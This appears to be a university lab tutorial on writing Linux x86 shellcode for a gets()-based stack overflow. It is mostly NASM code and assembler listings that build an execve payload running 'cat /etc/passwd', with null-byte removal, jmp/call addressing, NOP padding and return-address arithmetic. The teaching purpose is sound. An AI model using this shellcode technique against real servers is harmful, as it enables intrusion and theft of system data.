The Exploit

The exploit is a data theft exploit using a stack overflow vulnerability. The server is running with the standard input and output (stdin, and stdout) connected to the network socket. We want the server to execute the following command:

sh -c "cat /etc/passwd; exit" 

The sh command is the shell. If we execute it by itself, we get a command shell that we can type commands at it and get responses. Instead we want it to execute a command for us and send us the output. This command could be almost anything. We could ask it to delete a file, connect to another machine and copy a worm to the target machine, or in this case, read the contents of the file and send it to us. The actual file that contains the password is /etc/shadow, and it is only readable by root. The server is not running at root, so we would not be able to read it unless we knew of another exploit that allowed us to raise the privilege of our process. But the /etc/passwd file will give us a list of valid accounts which is still usefull information. But it could also be the contents of a mail folder, the printer spooler or other directory.

The exec system call is used to replace the current process with a new process. If we really wanted to be invisible, we would fork the server process and let it continue normally. However since this is only a two week lab, we will simply replace the server with the shell. There are several exec system calls, each with slightly different parameters. The one we will be using is the execve system call. It has the following signature:

result = execve(const char * path, char *const argv[], char *const envp[]);

The code for this system call is 11 decimal of 0x0b hex. The first parameter is the path to the command to be executed. In this case it is a pointer to the string "/bin/sh". The second parameter is a pointer to the argv parameter that will be passed to the main function of the process. This is an array of pointers to strings. Its contents are as follows

The third parameter an array containing the environment variables such as the search path (PATH variable). Since we are running a standard command, we do not have to provide a set of environment variables, so the last paramter can be NULL.

So we have to have to have the following contents in registers:

eax  0x0b
ebx ptr to "/bin/sh"
ecx ptr to argv array
edx 0

Figure 6 shows this in different manner:


Figure 6 - argument layout for execve system call

However, what figure 6 doesn't show is that we have to organize the structure in memory. When we compile a program, the compiler and the linker generate a file with the appropriate layout so that the operating system will load it when we want it executed. We have to provide the function of the assembler, the linker and the loader during our attack. Figure 7 shows the layout in memory of our attack.


Figure 7 – Program Layout in Memory

The memory starts at the beginning of the array on the stack. The distance from the beginning of array to the return address may be longer than you code and data. So padding characters to push the instructions and data up to the return address may be necessary. One other concern is that the function may modify some local variables before it returns. If those local variables are between the array and the return address, then we have to insert some padding between the data and the return address so that our data will not be modified when the local variables are modified. A perfect example is in the sample code on the previous web page. After the gets routine is called, the result variable is modified (memory is allocated and the pointer is assigned to result). This 4 byte variable is between the return buff array and the return address. So that location in our attack cannot contain data we need for the attack. For the purpose of the assignment, no such variable exists in the sample server you are attacking. The last two bytes of the program are a newline and a null character. The newline is used to terminate the gets call. The null character is the end of the string.

So lets look at wat a naive approach to this code would look like (we will fix it later). We will discuss the early attack analysis later, but assume that we know that the return address is located at 0xbffff510. Lets start with the data part of the program:

exeStr:    db "/bin/sh",0x0
flagStr:   db "-c",0x0
cmdStr:    db "cat /etc/passwd;exit",0x0
arrayAddr: dd exeStr
           dd flagStr
           dd cmdStr
           dd 0x0

This first contains the string data, and then the argv array. The strings are terminated with the NULL character, and the argv array is also NULL terminated. You should already be objecting. After all I already said that the data cannot contain null bytes. But we will leave that for later. The naive program contains the following instructions

           mov eax,0x0b
           mov ebx,exeStr
           mov ecx,arrayAddr
           mov edx,0x0
           int 0x80

So the entire naive program looks like

           bits 32
           mov eax,0x0b
           mov ebx,exeStr
           mov ecx,arrayAddr
           mov edx,0x0
           int 0x80
exeStr:    db "/bin/sh",0x0
flagStr:   db "-c",0x0
cmdStr:    db "cat /etc/passwd;exit",0x0
arrayAddr: dd exeStr
           dd flagStr
           dd cmdStr
           dd 0x0

If were somehow to get this program into the buffer memory and set the return address of the stack to the first move instruction, then the attack will succeed. However we cannot get this program into the memory. First there are the nulls in the data. So lets fix that first. Consider the following:

           bits 32
           mov eax,0x0b
           mov ebx,exeStr
           mov ecx,arrayAddr
           mov edx,0x0
           int 0x80
exeStr:    db "/bin/shX"
flagStr:   db "-cX"
cmdStr:    db "cat /etc/passwd;exitX"
arrayAddr: dd exeStr
           dd flagStr
           dd cmdStr
           dd 0xffffffff

In this code all of the NULL bytes have been replaced by the character 'X', and the null word at the end of the array is now 0xffffffff. Therefore we can get the data over to the network into the target program. However that means we have to add code to the instructions to null bytes to the code.

           bits 32
           mov eax,0x00
           mov [flagStr-1],al     ; move one null byte to end of /bin/sh
           mov [cmdStr-1],al      ; move one null byte to end of -c
           mov [arrayAddr-1],al   ; move one null byte to end of shell command
           mov [arrayAddr+12],eax ; move null word to end of array
           mov eax,0x0b
           mov ebx,exeStr
           mov ecx,arrayAddr
           mov edx,0x0
           int 0x80
exeStr:    db "/bin/shX"
flagStr:   db "-cX"
cmdStr:    db "cat /etc/passwd;exitX"
arrayAddr: dd exeStr
           dd flagStr
           dd cmdStr
           dd 0xffffffff

Lets look at the results of this code in nasm. Assuming this is in the file exploit.nasm, using the command

nasm -l exploit.lst -f bin exploit.nasm

will produce the following list file(Note: this assumes the version of NASM used on slackware 0.98.38).

  1 00000000 B800000000                  mov eax,0x00
  2 00000006 A2[36000000]                mov [flagStr-1],al     ; move one null byte to end of /bin/sh
  3 00000009 A2[39000000]                mov [cmdStr-1],al      ; move one null byte to end of -c
  4 0000000C A2[4E000000]                mov [arrayAddr-1],al   ; move one null byte to end of shell command
  5 0000000F A3[5B000000]                mov [arrayAddr+12],eax ; move null word to end of array
  6 00000013 B80B000000                  mov eax,0x0b
  7 00000019 BB[2F000000]                mov ebx,exeStr
  8 0000001F B9[4F000000]                mov ecx,arrayAddr
  9 00000025 BA00000000                  mov edx,0x0
 10 0000002B CD80                        int 0x80
 11 0000002D 2F62696E2F736858    exeStr: db "/bin/shX"
 12 00000035 2D6358             flagStr: db "-cX"
 13 00000038 636174202F6574632F- cmdStr: db "cat /etc/passwd;exitX"
 14 00000041 7061737377643B6578-
 15 0000004A 697458 
 16 0000004D [2D000000]       arrayAddr: dd exeStr
 17 00000051 [37000000]                  dd flagStr
 18 00000055 [3A000000]                  dd cmdStr
 19 00000059 FFFFFFFF                    dd 0xffffffff

There are several problems. The first is that the addresses are zero based while the real addresses are on the stack (in the 0xbffff900 - 0xbfffffc0 range). While we can fix those addresses manually (i.e. chanage the 2D000000 on line 7 to the real address on the stack), it is better if the code is position independent so we only have to enter one manual address, the new return address that will point into our code. For one thing, the address itself may contain a null byte or a newline byte (for example 0xbffff0a00 contains both). So what do we do? Well the best thing to do is to get the address of the first element of the data into an index register. We can do this with a jump and a call statement.

start:   jmp short codeEnd
start2:  pop esi
         ...code...
codeEnd: call start2
         ... data...

This will jump to the end of the code and then use a subroutine call to get back to the beginning of the code. The short modifier of the jump statement says that the jump is a maximum of 127 bytes. This limits the PC relative offset to be a single byte. The call statement pushes the address of the instruction following the call instruction on the stack. In our case, this is the first byte of the "/bin/shX" string. So we pop the address of the stack into the source index register. We then use the index register to access the bytes.

           bits 32
           nop
           nop
start:     jmp codeEnd
start2:    pop esi
           mov eax,0x00
           mov [esi+flagStr-exeStr-1],al     ; move one null byte to end of /bin/sh
           mov [esi+cmdStr-exeStr-1],al      ; move one null byte to end of -c
           mov [esi+arrayAddr-exeStr-1],al   ; move one null byte to end of shell command
           mov [esi+arrayAddr-exeStr+12],eax ; move null word to end of array
           mov eax,0x0b
           mov ebx,esi
           lea ecx,[esi+arrayAddr-exeStr]
           mov edx,0x0
           int 0x80
codeEnd:   call start2
exeStr:    db "/bin/shX"
flagStr:   db "-cX"
cmdStr:    db "cat /etc/passwd;exitX"
arrayAddr: dd exeStr
           dd flagStr
           dd cmdStr
           dd 0xffffffff
newAddr:   dd newAddr-start

Notice that each of the memory references to store the nulls in the data now use the source index register, esi, and also the exeStr label. For example the reference:

    [arrayAddr-1] 

becomes:

    [esi+arrayAddr-exeStr-1] 

Since the esi register contains the location of the exeStr label, subtracting the exeStr label gives us the appropriate indeex to use with the esi register. The esi register also provides us with the value for the ebx register. Obtaining the address of the argument array uses the load effective address (lea) instruction. This is like a move instruction, but the address of the operand is used instead of the contents of the memory. Two other additions have been made to the code. The first is several null operations (nop). This provides us with some leeway in the return address. The second is we have allocated some room for the actual return address. This will store the address of the beginning of the code. We ask the assembler to store the length of the code there (newAddr-start). We will use this value later. This gets us a little closer:

     1                                             bits 32
     2 00000000 90                                 nop
     3 00000001 90                                 nop
     4 00000002 EB2F                    start:     jmp short codeEnd
     5 00000004 5E                      start2:    pop esi
     6 00000005 B800000000                         mov eax,0x00
     7 0000000A 888607000000                       mov [esi+flagStr-exeStr-1],al
     8 00000010 88860A000000                       mov [esi+cmdStr-exeStr-1],al
     9 00000015 88861F000000                       mov [esi+arrayAddr-exeStr-1],al
    10 0000001A 89862C000000                       mov [esi+arrayAddr-exeStr+12],eax
    11 0000001F B80B000000                         mov eax,0x0b
    12 00000024 89F3                               mov ebx,esi
    13 00000026 8B8E20000000                       lea ecx,[esi+arrayAddr-exeStr]
    14 0000002C BA00000000                         mov edx,0x0
    15 00000031 CD80                               int 0x80
    16 00000033 E8CCFFFFFF              codeEnd:   call start2
    17 00000038 2F62696E2F736858        exeStr:    db "/bin/shX"
    18 00000040 2D6358                  flagStr:   db "-cX"
    19 00000043 636174202F6574632F-     cmdStr:    db "cat /etc/passwd;exitX"
    20 0000004C 7061737377643B6578-
    21 00000055 697458             
    22 00000058 [38000000]              arrayAddr: dd exeStr
    23 0000005C [40000000]                         dd flagStr
    24 00000060 [43000000]                         dd cmdStr
    25 00000064 FFFFFFFF                           dd 0xffffffff
    26 00000068 69000000                newAddr:   dd newAddr-start

But there are a lot of null bytes sitting arround. Most of them are in the offsets from esi. These offsets are not the lenght of the code but the distance from exeStr. These are all short distances. adding the byte attribute to the addresses solves that problem:

     1                                             bits 32
     2 00000000 90                                 nop
     3 00000001 90                                 nop
     4 00000002 EB29                    start:     jmp short codeEnd
     5 00000004 5E                      start2:    pop esi
     6 00000005 B800000000                         mov eax,0x00
     7 0000000A 884607                             mov [byte esi+flagStr-exeStr-1],al
     8 0000000D 88460A                             mov [byte esi+cmdStr-exeStr-1],al
     9 00000012 88461F                             mov [byte esi+arrayAddr-exeStr-1],al
    10 00000017 89462C                             mov [byte esi+arrayAddr-exeStr+12],eax
    11 0000001C B80B000000                         mov eax,0x0b
    12 00000021 89F3                               mov ebx,esi
    13 00000023 8D4E20                             lea ecx,[byte esi+arrayAddr-exeStr]
    14 00000026 BA00000000                         mov edx,0x0
    15 0000002B CD80                               int 0x80
    16 0000002D E8D2FFFFFF              codeEnd:   call start2
    17 00000032 2F62696E2F736858        exeStr:    db "/bin/shX"
    18 0000003A 2D6358                  flagStr:   db "-cX"
    19 0000003D 636174202F6574632F-     cmdStr:    db "cat /etc/passwd;exitX"
    20 00000046 7061737377643B6578-
    21 0000004F 697458             
    22 00000052 [32000000]              arrayAddr: dd exeStr
    23 00000056 [3A000000]                         dd flagStr
    24 0000005A [3D000000]                         dd cmdStr
    25 0000005E FFFFFFFF                           dd 0xffffffff
    26 00000062 5A000000                newAddr:   dd newAddr-start

There are only three problems left with the shell code. The first is the remaining nulls in the code. The come from the same source. Moving a constant to a register means storing the constant in the code. There are two instructions that attempt to zero a register (lines 6 and 14). If we change this instruction to an xor such as:

xor eax,eax

will zero the register. The other constant is on line 11. We want the A register to have the value 0x0b. This constant is only 8 bits long. That means we have to zero out the high bits. So a 32 bit move must include the three null bytes. It turns out the A register is already zero (from line 6). So we only have to move into the lower 8 bits:

mov al,0x0b

The second problem is that there is a newline in the middle of the code. Can you see it?

It is on line 8. The server program uses a gets function call to read from the network. If we try to send this code to the server, the server will stop reading at line 8 and will not overflow the return address. The offending byte is the offset for the instruction that moves a null byte to the end of the "-c" string. And if we check, we see that yes indeed, the 'X' placeholder character is indeed 10 characters from the beginning of the data part of our code. We can fix this by adding an arbitrary byte to the end of the /bin/shX string. (i.e. "/bin/shXy"). This will change the offset from 0x0A to 0x0B. But we have to remember to change the offset expression on line 7 to put the null byte in the right place.

The last problem is the contents of the argument array. We have to get the correct addresses into this code. Instead of putting in the address directly, we use some filler values that will be guaranteed to transmit properly through the network:

arrayAddr: dd 0xffffffff
           dd 0xffffffff
           dd 0xffffffff
           dd 0xffffffff

Then we add code that computes the address at runtime and puts it into the array. For example, to store the addrews of the "-c" string in the second element of the array:

lea edi,[byte esi+flagStr-exeStr]
mov [byte esi+arrayAddr-exeStr+4],edi

When these changes are made, the shell code is completed. Assemble them and copy them to selfcomp.c. Each byte (2 hex digits) must be reformatted for C character constants. That is, each is 0xHH where H is a hexidecimal digit. I find it helps to put the assembly in comments beside each set of hex bytes to keep the program strait.

Make sure you put enough 0x90 (nop instruction) padding at the beginning so that the four bytes that are the new return address align with the WXYZ in the string that you used to crash the program. So if you had 142 'x' characters, and the program and data is 115 bytes long (before the return address) then you have to put in 27 nop instructions.

The last thing to do is to figure out the return address. If we subtract 4 from the stack pointer given by the debugger when we crashed the program, we get the address of the return address. The assembler has computed the length of our program and stored it in the last word of the program. So we subtract that value from the address of the return address and that is the value we use for that word. So for example, if the address given in the debugger was 0xbffff72a and the length of the code is 0x69, then the value for the last word is

bffff72a - 4 - 69 = bffff726 - 69 = bffff71d

When you add the code to client.c, remember that you have to add a newline and a null byte to the end of you code so that the gets in the server will return and that the fprintf in the client will stop sending data.